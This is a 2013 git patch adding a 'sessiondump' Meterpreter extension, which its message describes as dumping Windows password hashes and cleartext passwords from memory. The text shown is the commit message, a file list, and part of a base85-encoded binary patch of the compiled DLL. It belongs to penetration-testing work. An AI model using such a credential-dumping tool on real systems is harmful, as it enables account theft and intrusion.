From 854ac2f8298cf6fd5212594f8f8592a154930a5e Mon Sep 17 00:00:00 2001
From: Steeve Barbeau <steeve.barbeau@hsc.fr>
Date: Mon, 22 Apr 2013 12:02:16 +0200
Subject: [PATCH 1/2] Sessiondump extension to dump password/hashs

This meterpreter extension can be used to dump hashes and passwords
from memory
Compatible with x86 and x64 systems from Windows XP/2003 to Windows
8/2012
Author : Steeve Barbeau (steeve DOT barbeau AT hsc DOT fr)
http://www.hsc.fr/ressources/outils/sessiondump/index.html.en
---
 data/meterpreter/ext_server_sessiondump.dll   | Bin 0 -> 70656 bytes
 .../ext_server_sessiondump.x64.dll            | Bin 0 -> 79360 bytes
 data/sessiondump_lsasrv_offsets.csv           |  65 ++
 data/sessiondump_wdigest_offsets.csv          |  30 +
 .../source/extensions/sessiondump/core.c      | 935 ++++++++++++++++++
 .../source/extensions/sessiondump/core.h      | 170 ++++
 .../extensions/sessiondump/sessiondump.c      | 325 ++++++
 .../extensions/sessiondump/sessiondump.h      |  74 ++
 .../ext_server_sessiondump.vcproj             | 411 ++++++++
 .../ext_server_sessiondump.vcxproj            | 239 +++++
 .../extensions/sessiondump/sessiondump.rb     | 176 ++++
 .../meterpreter/extensions/sessiondump/tlv.rb |  37 +
 .../console/command_dispatcher/sessiondump.rb | 304 ++++++
 13 files changed, 2766 insertions(+)
 create mode 100755 data/meterpreter/ext_server_sessiondump.dll
 create mode 100755 data/meterpreter/ext_server_sessiondump.x64.dll
 create mode 100755 data/sessiondump_lsasrv_offsets.csv
 create mode 100755 data/sessiondump_wdigest_offsets.csv
 create mode 100755 external/source/meterpreter/source/extensions/sessiondump/core.c
 create mode 100755 external/source/meterpreter/source/extensions/sessiondump/core.h
 create mode 100755 external/source/meterpreter/source/extensions/sessiondump/sessiondump.c
 create mode 100755 external/source/meterpreter/source/extensions/sessiondump/sessiondump.h
 create mode 100755 external/source/meterpreter/workspace/ext_server_sessiondump/ext_server_sessiondump.vcproj
 create mode 100644 external/source/meterpreter/workspace/ext_server_sessiondump/ext_server_sessiondump.vcxproj
 create mode 100755 lib/rex/post/meterpreter/extensions/sessiondump/sessiondump.rb
 create mode 100755 lib/rex/post/meterpreter/extensions/sessiondump/tlv.rb
 create mode 100755 lib/rex/post/meterpreter/ui/console/command_dispatcher/sessiondump.rb

diff --git a/data/meterpreter/ext_server_sessiondump.dll b/data/meterpreter/ext_server_sessiondump.dll
new file mode 100755
index 0000000000000000000000000000000000000000..9b1b35414e9826836a399ef33e3c75c9447541d8
GIT binary patch
literal 70656
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
